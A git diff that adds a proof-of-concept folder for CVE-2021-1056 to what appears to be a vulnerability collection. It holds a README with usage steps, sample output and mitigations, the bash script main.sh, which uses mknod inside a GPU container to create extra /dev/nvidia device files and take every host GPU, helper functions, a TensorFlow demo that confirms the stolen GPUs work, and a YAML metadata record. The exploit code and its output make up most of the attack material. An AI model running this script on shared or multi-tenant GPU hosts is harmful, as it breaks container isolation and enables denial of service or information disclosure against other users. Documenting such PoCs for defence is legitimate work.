diff --git a/cve/nvidia/2021/CVE-2021-1056/README.md b/cve/nvidia/2021/CVE-2021-1056/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..ca9ccc4ace773c69ce7d0c86d0b046628c9fb30c
--- /dev/null
+++ b/cve/nvidia/2021/CVE-2021-1056/README.md
@@ -0,0 +1,163 @@
+# CVE-2021-1056
+
+NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
+
+This repository demonstrates the vulnerability on GPU containers created by [nvidia-container-runtime](https://github.com/NVIDIA/nvidia-container-runtime). For in-depth details, see the accompanying [Ubuntu security tracker entry](https://ubuntu.com/security/CVE-2021-1056).
+
+## How it works
+
+By creating specific character device files, an attacker inside a GPU container (a container created by `nvidia-container-runtime`) can gain access to all GPU devices on the host.
+
+The same attack also works on GPU pods created by `k8s-device-plugin` in a Kubernetes cluster.
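+
+The core trick is small enough to show inline. The sketch below is a condensed version of what the `main.sh` script in this repository automates (the device index `1` is only an example): it reads the major/minor device numbers of the GPU device file the container was legitimately granted, then uses `mknod` to create additional `/dev/nvidiaN` files, after which the extra host GPUs become usable from inside the container.
+
+```bash
+# read the major/minor numbers of the GPU device the container was granted
+DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" /dev/nvidia0))
+# create an additional character device file for a GPU that was NOT granted
+# (index 1 is an example; main.sh probes indices until no new GPU shows up)
+mknod -m 666 /dev/nvidia1 c $DEV_NUMBER
+# the extra host GPU should now be visible in the container
+nvidia-smi
+```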
+
+## Prerequisite
+
+* Docker 19.03
+* `nvidia-container-toolkit`
+* NVIDIA Driver 418.87.01 / 450.51.05
+* NVIDIA GPU Tesla V100 / TITAN V / Tesla K80
+
+NOTE: according to the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142), this vulnerability affects all GeForce, NVIDIA RTX/Quadro, NVS, and Tesla series GPUs, on all driver versions.
+
+## Usage
+
+* Start a container with only 1 GPU card and mount this directory into it:
+
+```bash
+$ docker run --gpus 1 -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash
+```
+
+* Check GPU status **in the container**:
+
+```bash
+# nvidia-smi
+Sat Jan  9 07:21:03 2021
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
+|-------------------------------+----------------------+----------------------+
+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
+| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
+|                               |                      |               MIG M. |
+|===============================+======================+======================|
+|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
+| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes:                                                                  |
+|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
+|        ID   ID                                                   Usage      |
+|=============================================================================|
+|  No running processes found                                                 |
++-----------------------------------------------------------------------------+
+```
+
+* Execute the script **in the container**:
+
+```bash
+# bash /CVE-2021-1056/main.sh
+[INFO] init GPU num: 1
+[DEBUG] /dev/nvidia0 exists, skip
+[DEBUG] successfully get /dev/nvidia1
+[DEBUG] successfully get /dev/nvidia2
+[DEBUG] successfully get /dev/nvidia3
+[DEBUG] delete redundant /dev/nvidia4
+[INFO] get extra 3 GPU devices from host
+[INFO] current GPU num: 4
+[INFO] exec nvidia-smi:
+Sat Jan  9 07:22:43 2021
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
+|-------------------------------+----------------------+----------------------+
+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
+| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
+|                               |                      |               MIG M. |
+|===============================+======================+======================|
+|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
+| N/A   27C    P0    23W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
+| N/A   30C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   2  Tesla V100-PCIE...  Off  | 00000000:82:00.0 Off |                    0 |
+| N/A   29C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   3  Tesla V100-PCIE...  Off  | 00000000:83:00.0 Off |                    0 |
+| N/A   28C    P0    25W / 250W |      0MiB / 32510MiB |      0%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes:                                                                  |
+|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
+|        ID   ID                                                   Usage      |
+|=============================================================================|
+|  No running processes found                                                 |
++-----------------------------------------------------------------------------+
+```
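+
+As a quick sanity check (not part of the original PoC output), the created device files can also be listed directly; `/dev/nvidia1` through `/dev/nvidia3` should now sit next to the original `/dev/nvidia0`:
+
+```bash
+# list the NVIDIA character device files that now exist in the container
+ls -l /dev/nvidia*
+```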
+
+* Run a TensorFlow demo **in the container** to verify that all of the GPUs can indeed be accessed:
+
+```bash
+# nohup python /CVE-2021-1056/tf_distr_demo.py > log 2>&1 &
+# nvidia-smi
+Sat Jan  9 18:58:23 2021
++-----------------------------------------------------------------------------+
+| NVIDIA-SMI 450.51.05    Driver Version: 450.51.05    CUDA Version: 11.0     |
+|-------------------------------+----------------------+----------------------+
+| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
+| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
+|                               |                      |               MIG M. |
+|===============================+======================+======================|
+|   0  Tesla V100-PCIE...  Off  | 00000000:02:00.0 Off |                    0 |
+| N/A   32C    P0    36W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   1  Tesla V100-PCIE...  Off  | 00000000:03:00.0 Off |                    0 |
+| N/A   33C    P0    35W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   2  Tesla V100-PCIE...  Off  | 00000000:82:00.0 Off |                    0 |
+| N/A   33C    P0    36W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+|   3  Tesla V100-PCIE...  Off  | 00000000:83:00.0 Off |                    0 |
+| N/A   32C    P0    37W / 250W |  31117MiB / 32510MiB |      1%      Default |
+|                               |                      |                  N/A |
++-------------------------------+----------------------+----------------------+
+
++-----------------------------------------------------------------------------+
+| Processes:                                                                  |
+|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
+|        ID   ID                                                   Usage      |
+|=============================================================================|
++-----------------------------------------------------------------------------+
+```
+
+## How to prevent
+
+Recommended:
+
+* Follow the [NVIDIA Security Bulletin](https://nvidia.custhelp.com/app/answers/detail/a_id/5142) and update the NVIDIA GPU driver to a fixed version.
+
+Or:
+
+* Add `--cap-drop MKNOD` to the `docker run` command to forbid `mknod` inside containers (see the example below).
+* Enable a `securityContext` in Kubernetes clusters when creating a pod.
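+
+For the Docker case, dropping the capability only changes one flag relative to the Usage example above (a sketch; image, mount, and GPU request are unchanged):
+
+```bash
+# same container as before, but without the CAP_MKNOD capability,
+# so the mknod call in main.sh should fail with "Operation not permitted"
+docker run --gpus 1 --cap-drop MKNOD -v $PWD:/CVE-2021-1056 -it tensorflow/tensorflow:1.13.2-gpu bash
+```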
diff --git a/cve/nvidia/2021/CVE-2021-1056/main.sh b/cve/nvidia/2021/CVE-2021-1056/main.sh
new file mode 100644
index 0000000000000000000000000000000000000000..504871b786f1761357a85a9338e821920234db08
--- /dev/null
+++ b/cve/nvidia/2021/CVE-2021-1056/main.sh
@@ -0,0 +1,42 @@
+#!/usr/bin/env bash
+
+ROOT=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)
+source "${ROOT}/util.sh"
+
+INIT_GPU_NUM=$(util::get_gpu_num)
+util::log_info "init GPU num: $INIT_GPU_NUM"
+
+# get the major and minor device numbers from a legally granted GPU
+DEV=/dev/$(ls /dev | grep "nvidia[0-9]" | head -n 1)
+DEV_NUMBER=$(printf "%d %d" $(stat --format "0x%t 0x%T" "$DEV"))
+
+GPU_NO=0
+while :
+do
+  # skip this index if the device file already exists
+  if [ -c "/dev/nvidia$GPU_NO" ]; then
+    util::log_debug "/dev/nvidia$GPU_NO exists, skip"
+    GPU_NO=$((GPU_NO + 1))
+    continue
+  fi
+
+  CURRENT_GPU_NUM=$(util::get_gpu_num)
+
+  # create the device file for this index to trick the device cgroup
+  mknod -m 666 "/dev/nvidia$GPU_NO" c $DEV_NUMBER
+
+  # stop once no new GPU shows up, i.e. all GPUs on the host have been obtained
+  if [ "$(util::get_gpu_num)" == "$CURRENT_GPU_NUM" ]; then
+    util::log_debug "delete redundant /dev/nvidia$GPU_NO"
+    rm "/dev/nvidia$GPU_NO"
+    break
+  fi
+
+  util::log_debug "successfully get /dev/nvidia$GPU_NO"
+  GPU_NO=$((GPU_NO + 1))
+done
+
+util::log_info "get extra $((CURRENT_GPU_NUM - INIT_GPU_NUM)) GPU devices from host"
+util::log_info "current GPU num: $CURRENT_GPU_NUM"
+util::log_info "exec nvidia-smi:"
+nvidia-smi
diff --git a/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
new file mode 100644
index 0000000000000000000000000000000000000000..e662da3464a603bf549d6001e568c9ab2c2c0483
--- /dev/null
+++ b/cve/nvidia/2021/CVE-2021-1056/tf_distr_demo.py
@@ -0,0 +1,106 @@
+# coding=utf-8
+# Multi-GPU MNIST MLP used only to verify that every GPU obtained by main.sh
+# can actually run computation (TensorFlow 1.x graph-mode API).
+from tensorflow.examples.tutorials.mnist import input_data
+from tensorflow.python.client import device_lib
+
+mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
+
+import tensorflow as tf
+
+learning_rate = 0.001
+training_steps = 8250
+batch_size = 100
+display_step = 100
+
+n_hidden_1 = 256
+n_hidden_2 = 256
+n_input = 784
+n_classes = 10
+
+
+def _variable_on_cpu(name, shape, initializer):
+    # keep the shared variables on the CPU so every GPU tower can reuse them
+    with tf.device('/cpu:0'):
+        dtype = tf.float32
+        var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
+    return var
+
+
+def build_model():
+
+    def multilayer_perceptron(x, weights, biases):
+        layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
+        layer_1 = tf.nn.relu(layer_1)
+
+        layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
+        layer_2 = tf.nn.relu(layer_2)
+
+        out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
+        return out_layer
+
+    with tf.variable_scope('aaa'):
+        weights = {
+            'h1': _variable_on_cpu('h1', [n_input, n_hidden_1], tf.random_normal_initializer()),
+            'h2': _variable_on_cpu('h2', [n_hidden_1, n_hidden_2], tf.random_normal_initializer()),
+            'out': _variable_on_cpu('out_w', [n_hidden_2, n_classes], tf.random_normal_initializer())
+        }
+        biases = {
+            'b1': _variable_on_cpu('b1', [n_hidden_1], tf.random_normal_initializer()),
+            'b2': _variable_on_cpu('b2', [n_hidden_2], tf.random_normal_initializer()),
+            'out': _variable_on_cpu('out_b', [n_classes], tf.random_normal_initializer())
+        }
+
+        pred = multilayer_perceptron(x, weights, biases)
+
+        cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
+    return cost, pred
+
+
+def average_gradients(tower_grads):
+    # average the gradients computed by every GPU tower, variable by variable
+    average_grads = []
+    for grad_and_vars in zip(*tower_grads):
+        grads = []
+        for g, _ in grad_and_vars:
+            expanded_g = tf.expand_dims(g, 0)
+            grads.append(expanded_g)
+        grad = tf.concat(axis=0, values=grads)
+        grad = tf.reduce_mean(grad, 0)
+        v = grad_and_vars[0][1]
+        grad_and_var = (grad, v)
+        average_grads.append(grad_and_var)
+    return average_grads
+
+
+with tf.Graph().as_default(), tf.device('/cpu:0'):
+    x = tf.placeholder("float", [None, n_input])
+    y = tf.placeholder("float", [None, n_classes])
+    tower_grads = []
+    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
+    # build one model tower per visible GPU, including those obtained by main.sh
+    local_device_protos = device_lib.list_local_devices()
+    num_gpus = sum([1 for d in local_device_protos if d.device_type == 'GPU'])
+    with tf.variable_scope(tf.get_variable_scope()):
+        for i in range(num_gpus):
+            with tf.device('/gpu:%d' % i):
+                cost, pred = build_model()
+                tf.get_variable_scope().reuse_variables()
+                grads = optimizer.compute_gradients(cost)
+                tower_grads.append(grads)
+
+    grads = average_gradients(tower_grads)
+    apply_gradient_op = optimizer.apply_gradients(grads)
+    train_op = apply_gradient_op
+
+    init = tf.global_variables_initializer()
+    sess = tf.Session()
+    sess.run(init)
+
+    for step in range(training_steps):
+        image_batch, label_batch = mnist.train.next_batch(batch_size)
+        _, cost_print = sess.run([train_op, cost],
+                                 {x: image_batch,
+                                  y: label_batch})
+
+        if step % display_step == 0:
+            print("step=%04d" % (step + 1) + " cost=" + str(cost_print))
+    print("Optimization Finished!")
+
+    correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
+    accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
+    with sess.as_default():
+        print("Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels}))
+    sess.close()
diff --git a/cve/nvidia/2021/CVE-2021-1056/util.sh b/cve/nvidia/2021/CVE-2021-1056/util.sh
new file mode 100644
index 0000000000000000000000000000000000000000..edadd3aa99b99d1033832f9b548ffb59c48e046a
--- /dev/null
+++ b/cve/nvidia/2021/CVE-2021-1056/util.sh
@@ -0,0 +1,13 @@
+#!/usr/bin/env bash
+
+# count the GPUs currently visible to the driver
+function util::get_gpu_num() {
+  echo "$(nvidia-smi -L | wc -l)"
+}
+
+function util::log_info() {
+  echo "[INFO] $1"
+}
+
+function util::log_debug() {
+  echo "[DEBUG] $1"
+}
diff --git a/cve/nvidia/2021/yaml/CVE-2021-1056.yaml b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..40d10b98d652d130214bbe641a4d6e75320bad06
--- /dev/null
+++ b/cve/nvidia/2021/yaml/CVE-2021-1056.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-1056
+source: https://github.com/pokerfaceSad/CVE-2021-1056
+info:
+  name: NVIDIA provides official graphics drivers for Linux systems. These drivers include kernel modules, user-space libraries, and command-line tools that integrate with the Linux operating system to deliver high-performance graphics acceleration and compute capability.
+  severity: High
+  description: |
+    CVE-2021-1056 is a security vulnerability in the NVIDIA GPU driver related to device isolation. When a container is started in non-privileged mode, an attacker exploiting this vulnerability can create special character device files inside the container and thereby gain access to all GPU devices on the host.
+    NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
+  scope-of-influence:
+    nvidia:gpu_driver:390≤390.141, nvidia:gpu_driver:450≤450.102.04, nvidia:gpu_driver:460≤460.32.03.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1056
+    - https://nvidia.custhelp.com/app/answers/detail/a_id/5142
+    - https://ubuntu.com/security/notices/USN-4689-1
+    - https://ubuntu.com/security/notices/USN-4689-2
+    - https://ubuntu.com/security/CVE-2021-1056
+    - https://www.cvedetails.com/cve/CVE-2021-1056/?q=CVE-2021-1056
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
+    cvss-score: 7.1
+    cve-id: CVE-2021-1056
+    cwe-id: CWE-276
+  tags: privilege escalation, denial of service, information disclosure, cve2021
diff --git a/other_list.yaml b/other_list.yaml
index 390c34e04dedcdc99b1d42c4fb2523b4a9b5e825..dc15528a0e6b8415d6fa0062b0dc3ad6064e9bb3 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -16,4 +16,6 @@ cve:
   - CVE-2023-37708
  samba:
   - CVE-2021-44142
+ nvidia:
+  - CVE-2021-1056
 cnvd: